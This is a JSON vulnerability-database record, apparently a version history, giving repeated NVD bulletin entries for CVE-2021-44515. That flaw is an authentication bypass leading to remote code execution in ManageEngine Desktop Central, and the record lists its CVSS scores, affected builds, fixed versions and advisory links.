"wildExploitedSources": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}], "modified": "2021-12-16T23:56:45"}, "score": {"value": 2.7, "vector": "NONE", "modified": "2021-12-14T08:36:42", "rev": 2}, "twitter": {"counter": 4, "tweets": [{"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}], "modified": "2021-12-14T08:36:42"}}, "objectVersion": "1.6", "cpe": [], "cpe23": [], "cwe": [], "affectedSoftware": [], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": []}, "extraReferences": [{"url": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "name": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "refsource": "CONFIRM", "tags": []}, {"url": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "name": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "refsource": "MISC", "tags": []}, {"url": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "name": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "refsource": "CONFIRM", "tags": []}]}, "lastseen": "2021-12-16T23:56:45", "differentElements": ["affectedSoftware", "cpe", "cpe23", "cpeConfiguration", "cvss", "cvss2", "cvss3", "cwe", "extraReferences", "modified"], "edition": 28}, {"bulletin": {"id": "CVE-2021-44515", "vendorId": null, "hash": "ef3259d039a75fd744dba86cda6e391a", "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-44515", "description": "Zoho ManageEngine Desktop Central is vulnerable to authentication bypass, leading to remote code execution on the server, as exploited in the wild in December 2021. For Enterprise builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For Enterprise builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3. For MSP builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For MSP builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3.", "published": "2021-12-12T05:15:00", "modified": "2021-12-16T14:16:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 10.0}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-44515", "reporter": "cve@mitre.org", "references": ["https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html"], "cvelist": ["CVE-2021-44515"], "immutableFields": [], "lastseen": "2021-12-17T00:25:33", "history": [], "viewCount": 24, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}, {"type": "nessus", "idList": ["MANAGEENGINE_DESKTOP_CENTRAL_10_1_2137_3.NASL"]}, {"type": "cisa", "idList": ["CISA:C9AC32BB051B58B7F0F6E0FD2949390C", "CISA:380E63A9EAAD85FA1950A6973017E11B"]}, {"type": "thn", "idList": ["THN:DB8E18C57AFB9EEEFDABD840FBF5D938"]}, {"type": "hivepro", "idList": ["HIVEPRO:C7C4C4FD6D71992EA2AF88F0ECFBD280"]}], "modified": "2021-12-14T08:36:42", "rev": 2}, "exploitation": {"wildExploited": true, "wildExploitedSources": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}], "modified": "2021-12-16T23:56:45"}, "score": {"value": 2.7, "vector": "NONE", "modified": "2021-12-14T08:36:42", "rev": 2}, "twitter": {"counter": 4, "tweets": [{"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}], "modified": "2021-12-14T08:36:42"}}, "objectVersion": "1.6", "cpe": ["cpe:/a:zohocorp:manageengine_desktop_central:10.1.2137.3"], "cpe23": ["cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2137.3:*:*:*:enterprise:*:*:*"], "cwe": ["CWE-287"], "affectedSoftware": [{"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2127.18", "operator": "lt", "name": "zohocorp manageengine desktop central"}, {"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2127.18", "operator": "lt", "name": "zohocorp manageengine desktop central"}, {"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2137.3", "operator": "lt", "name": "zohocorp manageengine desktop central"}, {"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2137.3", "operator": "le", "name": "zohocorp manageengine desktop central"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2127.18:*:*:*:enterprise:*:*:*", "versionEndExcluding": "10.1.2127.18", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2127.18:*:*:*:managed_service_providers:*:*:*", "versionEndExcluding": "10.1.2127.18", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2137.3:*:*:*:managed_service_providers:*:*:*", "versionStartIncluding": "10.1.2128.0", "versionEndExcluding": "10.1.2137.3", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2137.3:*:*:*:enterprise:*:*:*", "versionStartIncluding": "10.1.2128.0", "versionEndIncluding": "10.1.2137.3", "cpe_name": []}]}]}, "extraReferences": [{"url": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "name": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "refsource": "CONFIRM", "tags": ["Issue Tracking", "Vendor Advisory"]}, {"url": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "name": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "refsource": "MISC", "tags": ["Third Party Advisory", "US Government Resource"]}, {"url": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "name": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "refsource": "CONFIRM", "tags": ["Exploit", "Patch", "Vendor Advisory"]}]}, "lastseen": "2021-12-17T00:25:33", "differentElements": ["affectedSoftware", "cpe", "cpe23", "cpeConfiguration", "cvss", "cvss2", "cvss3", "cwe", "extraReferences", "modified"], "edition": 29}, {"bulletin": {"id": "CVE-2021-44515", "vendorId": null, "hash": "68d9bafd6b120bb5f87bb11033a1b946", "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-44515", "description": "Zoho ManageEngine Desktop Central is vulnerable to authentication bypass, leading to remote code execution on the server, as exploited in the wild in December 2021. For Enterprise builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For Enterprise builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3. For MSP builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For MSP builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3.", "published": "2021-12-12T05:15:00", "modified": "2021-12-13T13:01:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-44515", "reporter": "cve@mitre.org", "references": ["https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html"], "cvelist": ["CVE-2021-44515"], "immutableFields": [], "lastseen": "2021-12-17T00:25:43", "history": [], "viewCount": 24, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}, {"type": "nessus", "idList": ["MANAGEENGINE_DESKTOP_CENTRAL_10_1_2137_3.NASL"]}, {"type": "cisa", "idList": ["CISA:C9AC32BB051B58B7F0F6E0FD2949390C", "CISA:380E63A9EAAD85FA1950A6973017E11B"]}, {"type": "thn", "idList": ["THN:DB8E18C57AFB9EEEFDABD840FBF5D938"]}, {"type": "hivepro", "idList": ["HIVEPRO:C7C4C4FD6D71992EA2AF88F0ECFBD280"]}], "modified": "2021-12-14T08:36:42", "rev": 2}, "exploitation": {"wildExploited": true, "wildExploitedSources": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}], "modified": "2021-12-17T00:25:43"}, "score": {"value": 2.7, "vector": "NONE", "modified": "2021-12-14T08:36:42", "rev": 2}, "twitter": {"counter": 4, "tweets": [{"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}], "modified": "2021-12-14T08:36:42"}}, "objectVersion": "1.6", "cpe": [], "cpe23": [], "cwe": [], "affectedSoftware": [], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": []}, "extraReferences": [{"url": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "name": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "refsource": "CONFIRM", "tags": []}, {"url": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "name": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "refsource": "MISC", "tags": []}, {"url": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "name": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "refsource": "CONFIRM", "tags": []}]}, "lastseen": "2021-12-17T00:25:43", "differentElements": ["affectedSoftware", "cpe", "cpe23", "cpeConfiguration", "cvss", "cvss2", "cvss3", "cwe", "extraReferences", "modified"], "edition": 30}, {"bulletin": {"id": "CVE-2021-44515", "vendorId": null, "hash": "ef3259d039a75fd744dba86cda6e391a", "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-44515", "description": "Zoho ManageEngine Desktop Central is vulnerable to authentication bypass, leading to remote code execution on the server, as exploited in the wild in December 2021. For Enterprise builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For Enterprise builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3. For MSP builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For MSP builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3.", "published": "2021-12-12T05:15:00", "modified": "2021-12-16T14:16:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 10.0}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-44515", "reporter": "cve@mitre.org", "references": ["https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html"], "cvelist": ["CVE-2021-44515"], "immutableFields": [], "lastseen": "2021-12-17T00:55:33", "history": [], "viewCount": 24, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}, {"type": "nessus", "idList": ["MANAGEENGINE_DESKTOP_CENTRAL_10_1_2137_3.NASL"]}, {"type": "cisa", "idList": ["CISA:C9AC32BB051B58B7F0F6E0FD2949390C", "CISA:380E63A9EAAD85FA1950A6973017E11B"]}, {"type": "thn", "idList": ["THN:DB8E18C57AFB9EEEFDABD840FBF5D938"]}, {"type": "hivepro", "idList": ["HIVEPRO:C7C4C4FD6D71992EA2AF88F0ECFBD280"]}], "modified": "2021-12-14T08:36:42", "rev": 2}, "exploitation": {"wildExploited": true, "wildExploitedSources": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}], "modified": "2021-12-17T00:25:43"}, "score": {"value": 2.7, "vector": "NONE", "modified": "2021-12-14T08:36:42", "rev": 2}, "twitter": {"counter": 4, "tweets": [{"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}], "modified": "2021-12-14T08:36:42"}}, "objectVersion": "1.6", "cpe": ["cpe:/a:zohocorp:manageengine_desktop_central:10.1.2137.3"], "cpe23": ["cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2137.3:*:*:*:enterprise:*:*:*"], "cwe": ["CWE-287"], "affectedSoftware": [{"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2127.18", "operator": "lt", "name": "zohocorp manageengine desktop central"}, {"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2127.18", "operator": "lt", "name": "zohocorp manageengine desktop central"}, {"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2137.3", "operator": "lt", "name": "zohocorp manageengine desktop central"}, {"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2137.3", "operator": "le", "name": "zohocorp manageengine desktop central"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2127.18:*:*:*:enterprise:*:*:*", "versionEndExcluding": "10.1.2127.18", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2127.18:*:*:*:managed_service_providers:*:*:*", "versionEndExcluding": "10.1.2127.18", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2137.3:*:*:*:managed_service_providers:*:*:*", "versionStartIncluding": "10.1.2128.0", "versionEndExcluding": "10.1.2137.3", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2137.3:*:*:*:enterprise:*:*:*", "versionStartIncluding": "10.1.2128.0", "versionEndIncluding": "10.1.2137.3", "cpe_name": []}]}]}, "extraReferences": [{"url": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "name": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "refsource": "CONFIRM", "tags": ["Issue Tracking", "Vendor Advisory"]}, {"url": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "name": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "refsource": "MISC", "tags": ["Third Party Advisory", "US Government Resource"]}, {"url": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "name": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "refsource": "CONFIRM", "tags": ["Exploit", "Patch", "Vendor Advisory"]}]}, "lastseen": "2021-12-17T00:55:33", "differentElements": ["affectedSoftware", "cpe", "cpe23", "cpeConfiguration", "cvss", "cvss2", "cvss3", "cwe", "extraReferences", "modified"], "edition": 31}, {"bulletin": {"id": "CVE-2021-44515", "vendorId": null, "hash": "68d9bafd6b120bb5f87bb11033a1b946", "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-44515", "description": "Zoho ManageEngine Desktop Central is vulnerable to authentication bypass, leading to remote code execution on the server, as exploited in the wild in December 2021. For Enterprise builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For Enterprise builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3. For MSP builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For MSP builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3.", "published": "2021-12-12T05:15:00", "modified": "2021-12-13T13:01:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-44515", "reporter": "cve@mitre.org", "references": ["https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html"], "cvelist": ["CVE-2021-44515"], "immutableFields": [], "lastseen": "2021-12-17T00:55:43", "history": [], "viewCount": 24, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}, {"type": "nessus", "idList": ["MANAGEENGINE_DESKTOP_CENTRAL_10_1_2137_3.NASL"]}, {"type": "cisa", "idList": ["CISA:C9AC32BB051B58B7F0F6E0FD2949390C", "CISA:380E63A9EAAD85FA1950A6973017E11B"]}, {"type": "thn", "idList": ["THN:DB8E18C57AFB9EEEFDABD840FBF5D938"]}, {"type": "hivepro", "idList": ["HIVEPRO:C7C4C4FD6D71992EA2AF88F0ECFBD280"]}], "modified": "2021-12-14T08:36:42", "rev": 2}, "exploitation": {"wildExploited": true, "wildExploitedSources": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}], "modified": "2021-12-17T00:55:43"}, "score": {"value": 2.7, "vector": "NONE", "modified": "2021-12-14T08:36:42", "rev": 2}, "twitter": {"counter": 4, "tweets": [{"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}], "modified": "2021-12-14T08:36:42"}}, "objectVersion": "1.6", "cpe": [], "cpe23": [], "cwe": [], "affectedSoftware": [], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": []}, "extraReferences": [{"url": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "name": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "refsource": "CONFIRM", "tags": []}, {"url": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "name": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "refsource": "MISC", "tags": []}, {"url": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "name": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "refsource": "CONFIRM", "tags": []}]}, "lastseen": "2021-12-17T00:55:43", "differentElements": ["affectedSoftware", "cpe", "cpe23", "cpeConfiguration", "cvss", "cvss2", "cvss3", "cwe", "extraReferences", "modified"], "edition": 32}, {"bulletin": {"id": "CVE-2021-44515", "vendorId": null, "hash": "ef3259d039a75fd744dba86cda6e391a", "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-44515", "description": "Zoho ManageEngine Desktop Central is vulnerable to authentication bypass, leading to remote code execution on the server, as exploited in the wild in December 2021. For Enterprise builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For Enterprise builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3. For MSP builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For MSP builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3.", "published": "2021-12-12T05:15:00", "modified": "2021-12-16T14:16:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 10.0}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, 